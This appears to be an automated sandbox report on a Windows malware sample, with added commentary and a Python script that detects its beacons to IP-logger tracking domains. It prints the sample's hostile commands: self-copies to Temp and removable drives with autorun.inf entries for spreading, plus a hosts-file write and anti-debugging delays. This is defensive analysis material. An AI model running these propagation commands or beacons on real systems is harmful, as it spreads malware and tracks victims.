Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/F
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgH
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.world/
Source: IPrstVM17M.exe, 00000000.00000003.1992051508.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg:
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stopify.co/
Source: IPrstVM17M.exe, bin.exe.3.dr String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg%
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpgm
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
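The requests above are the sample's two network behaviours: a reachability probe to google.com with the hard-coded `User-Agent: MyApp` (answered with Google's `/sorry/index` automated-traffic challenge, which is what a non-browser client with no cookies gets), and the identical path `/news.php?tid=JBB69H.jpg` sent to stopify.co, grabify.world and grabify.link in turn. grabify.link is a public IP-logger/link-tracking service; the other two hosts are treated here as alternate domains for the same tracking endpoint, inferred only from the fact that they receive the same path. The Python below is an added detection example for this report, not Joe Sandbox's signature logic. It runs over constructed, tab-separated HTTP request records in the shape the report shows (process, method, host, URI, user agent), with a constructed Firefox line as a benign control; the browser-process list, the `IP_LOGGER_DOMAINS` set and the log format are assumptions of the example.

```python
"""Detection example added for this report (not Joe Sandbox's signature
logic): run over per-process HTTP request records and flag the beacon
pattern this sample shows."""
import re
from collections import defaultdict

# Constructed log lines in the order the report lists the requests. Fields are
# tab-separated: process, method, host, uri, user_agent. The firefox.exe line
# is a constructed benign control and does not come from the report.
SAMPLE_HTTP_LOG = """\
IPrstVM17M.exe\tGET\tstopify.co\t/news.php?tid=JBB69H.jpg\tMyApp
IPrstVM17M.exe\tGET\tgrabify.world\t/news.php?tid=JBB69H.jpg\tMyApp
IPrstVM17M.exe\tGET\tgrabify.link\t/news.php?tid=JBB69H.jpg\tMyApp
IPrstVM17M.exe\tGET\tgoogle.com\t/\tMyApp
IPrstVM17M.exe\tGET\twww.google.com\t/sorry/index?continue=http://google.com/&q=EgSaEGkk\tMyApp
firefox.exe\tGET\twww.google.com\t/\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/124.0
"""

# Assumed allow-list of processes expected to talk HTTP with a browser UA.
BROWSER_PROCESSES = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
# Tracker domains seen in this report; grabify.link is a known IP-logger service.
IP_LOGGER_DOMAINS = {"grabify.link", "grabify.world", "stopify.co"}
BROWSER_UA = re.compile(r"^Mozilla/\d")


def parse_http_log(text):
    """Parse the constructed tab-separated format into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        process, method, host, uri, ua = line.split("\t", 4)
        records.append({"process": process, "method": method, "host": host,
                        "uri": uri, "user_agent": ua})
    return records


def flag_beacons(records):
    """Return (rule, process, host_or_hosts) findings for the sample's pattern."""
    findings = []
    hosts_by_uri = defaultdict(set)  # (process, uri) -> hosts that received it
    for r in records:
        host = r["host"].lower()
        non_browser = r["process"].lower() not in BROWSER_PROCESSES
        if host in IP_LOGGER_DOMAINS:
            findings.append(("ip_logger_domain", r["process"], host))
        if non_browser and not BROWSER_UA.match(r["user_agent"]):
            findings.append(("non_browser_user_agent", r["process"], host))
        if non_browser and host in ("google.com", "www.google.com"):
            findings.append(("google_from_non_browser", r["process"], host))
        hosts_by_uri[(r["process"], r["uri"])].add(host)
    # One parameterised path sent to several hosts by one process: a fallback
    # list for a single endpoint, which survives the operator changing domains.
    for (process, uri), hosts in hosts_by_uri.items():
        if "?" in uri and len(hosts) >= 2:
            findings.append(("fallback_hosts_same_uri", process, ",".join(sorted(hosts))))
    return findings


if __name__ == "__main__":
    for rule, process, where in flag_beacons(parse_http_log(SAMPLE_HTTP_LOG)):
        print(f"{rule:26} {process:16} {where}")
```

The `fallback_hosts_same_uri` rule is the one worth keeping after the domains rotate: the tracker hosts can change, but one process sending one parameterised path to several unrelated hosts in a row is the behaviour. The `tid=JBB69H.jpg` value is the per-link identifier on the tracking service, so it is a usable indicator alongside the three hosts, and the `MyApp` user agent on port 80 is what triggers the report's "Queries Google from non browser process" signature.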

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\IPrstVM17M.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: String function: 00207BE0 appears 38 times
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: String function: 00207E40 appears 373 times
Source: IPrstVM17M.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal64.adwa.evad.winEXE@16/4@5/5
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_00201F90 CreateToolhelp32Snapshot,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,Process32FirstW,CloseHandle,Process32NextW,_invalid_parameter_noinfo_noreturn,CloseHandle, 0_2_00201F90
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: IPrstVM17M.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IPrstVM17M.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: IPrstVM17M.exe ReversingLabs: Detection: 15%
Source: IPrstVM17M.exe Virustotal: Detection: 14%
Source: IPrstVM17M.exe String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe String found in binary or memory: @Unknown exceptionbad array new lengthstring too longbad castFailed to create process snapshot.Failed to retrieve first process.MyApphttps://stopify.co/news.php?tid=JBB69H.jpg Failed to open URL. Error code: Failed to initialize WinINet. Error code: Error: Unable to open file Error: Unable to open file for writing: Text appended to executable successfully./tsoHbrKdetcirtseR))2918=:308.4.1.655311.048.2.1:lortnoCtnuoccAresu()retupmoc=ssalCtcejbo()retupmoc=yrogetaCtcejbo(&(dleiFgnikcaB__k>npU<)+]}0{[(|)$+.*]}0{[(dleiFgnikcaB__k>mlaer<YTIROHTUA_REIFITNEDI_DIS_CPR_ofnInogoLniamoDnigoLdnAlacigoLpOepytyalpsiDecruoseRnoisseSnogoLgnitanigirOdleiFgnikcaB__k>stekcit<YTIRGETNI_OFNI_NEKOT_PASLdleiFgnikcaB__k>muskcehc<etacifitreCrevreSyfireV_teg}} }1{ = eulav ,}0{ = xedni {{dleiFgnikcaB__k>emaNniamoDsnD<dleiFgnikcaB__k>epyTnoitpyrcnE<dleiFgnikcaB__k>yeKcilbuPtcejbuS<dmctnirptratSnoitcellocdetroppusnu sirotareneG.emirP.htaM.onoMsgratnirpffogoltsalecnoNrevres5.2.4.3.101.1.048.61.2dleiFgnikcaB__k>edoc_rorre<DROWSSAP_ERIPXE_TNODEGNAHC_TNAC_DWSSAPrepleHreffuBceSelpitluMyarrAsetyBreffuBcesnoitcelloCrellortnoCniamoDegAdrowssaPmuminiMegAdrowssaPmumixaMepyTsserddArellortnoCniamoDsserddArellortnoCniamoDtsrif snmuloc eht tes 
esaelP1__b>shtgneLnmuloC<reifitnedIyrotceriDpadLkcabllaCetacifitreCrevreSyfireVemittrats_tegemittrats_tes0_etirW1_etirW2_etirW74.1.4.3.101.1.048.61.272.1.4.3.101.1.048.61.27.1.4.3.101.1.048.61.2pmatsemitnogoltsalnogoltsal2__b>yeKetavirProFniPteS<1__b>yeKetavirProFniPteS<0__b>yeKetavirProFniPteS<eldnaHredivorPotpyrCyeKetavirProFniPteSevirDyrotceriDemoHemaNniamoDnogoLtpircSnogoLemiTffogoLtnuoCnogoLreussillac-noitcurtsnidloh-ditcejer-noitcurtsnidloh-dienon-noitcurtsnidloh-di652ahs-htiw-asd-di422ahs-htiw-asd-ditnuoCtniopdnEqestorPcpRREIFITNEDI_XATNYS_CPRECAFRETNI_REVRES_CPRTNIOPDNE_QESTORP_CPRELBAT_HCTAPSID_CPRtniopdnEqestorPcpRtnuoCelbaThctapsiDOFNI_REVRES_LDIM1.3.2.5.1.6.3.1NWONKNU_SUTATS_NOITACOVER_RRE_CDKDERIUQER_RESU_OT_RESU_RRE_PA_BRKETACIFITREC_YFIREV_TNAC_RRE_CDKHCTAMSIM_EMAN_TNEILC_RRE_CDKEUQINU_TON_LAPICNIRP_RRE_CDKTSEUQER_EHCAC_TKT_YREUQ_BREKNWONKNU_LAPICNIRP_C_RRE_CDKTNUOCCA_TSURT_REVRESdleiFgnikcaB__k>stnetnoc<3.2.04001.048.2.12.2.04001.048.2.11.2.04001.048.2.184.1.4.3.101.1.048.61.282.1.4.3.101.1.048.61.28.1.4.3.101.1.048.61.2sepytnoitpyrcnedetroppus-sdsmdetaercnehwytitnedIrehtOfOflaheBnOtcAoTdewollA-SDsmslapicnirPytiruceSngieroF=NCstnuoccA ecivreS deganaM=NCsrellortnoC niamoD=UOlortnoctnuoccaresumetsySCetacoLDC no rorrE}3,1{d\}3{).\}3,1{d\(|}4,1{]f-aF-A9-0[}7{):}4,1{]f-aF-A9-0[(mrof lamiced ro xeh a ni ton si eulav gnirts DIUL dessaP.0 naht retaerg eb tsum 'snmuloc' - )(tilpS ]RORRE[gnirtSeniLelgnis - )(tilpS ]RORRE[}0{ : emaNresU}0{ : niamoD}0{ : epyTnogoL}0{ : dInogoL}0{ : revreSnogoL}0{ : niamoDSNDrevreSnogoL}0{ : egakcaPnoitacitnehtuA}0{ : emaNlapicnirPresU}0{ : DISresU/,,,,,,(Fvo*V&<`?*V'@g?+W&8U/+W(Fv?*V0.0.1v xEresufnoCredoc
Source: unknown Process created: C:\Users\user\Desktop\IPrstVM17M.exe "C:\Users\user\Desktop\IPrstVM17M.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IPrstVM17M.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Users\user\Desktop\IPrstVM17M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Window / User API: threadDelayed 365 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 Thread sleep time: -365000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 Thread sleep time: -347000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Last function: Thread delayed
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(C
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_002029B0 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,IsDebuggerPresent,GetModuleFileNameA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,GetEnvironmentVariableA,getenv,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,memcpy,memcpy,memcpy,GetEnvironmentVariableA,memcpy,_invalid_parameter_noinfo_noreturn,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sle